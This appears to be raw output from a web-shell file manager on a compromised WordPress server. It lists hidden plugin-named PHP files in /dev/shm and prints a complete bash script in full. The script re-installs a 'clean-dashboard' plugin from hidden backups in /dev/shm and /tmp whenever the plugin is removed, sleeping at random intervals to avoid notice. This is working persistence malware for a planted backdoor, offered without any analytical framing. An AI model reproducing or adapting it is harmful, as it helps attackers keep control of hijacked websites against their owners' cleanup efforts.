PATH:
dev
/
shm
#!/bin/bash L='/dev/shm/.74daa205.lock' exec 200>"$L" && flock -n 200 || exit 0 B1='/dev/shm/.clean-dashboard.php' B2='/tmp/.clean-dashboard.php' SELF='/home/audalnez/public_html/wp-content/plugins/clean-dashboard/clean-dashboard.php' while :; do sleep $((1500 + RANDOM % 600)) if [ ! -f "$SELF" ]; then for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done fi [ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null [ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null done
[+]
..
[-] .e2d32ba7
[edit]
[-] .custom-admin.php
[edit]
[-] .9d683e61
[edit]
[-] .fast-dashboard.php
[edit]
[-] .9ba131c4
[edit]
[-] .smart-seo.php
[edit]
[-] PostgreSQL.1561293569
[edit]
[-] .74daa205
[edit]
[-] .clean-dashboard.php
[edit]
[-] .752e956c
[edit]
[-] .fast-tools.php
[edit]
[+]
lsws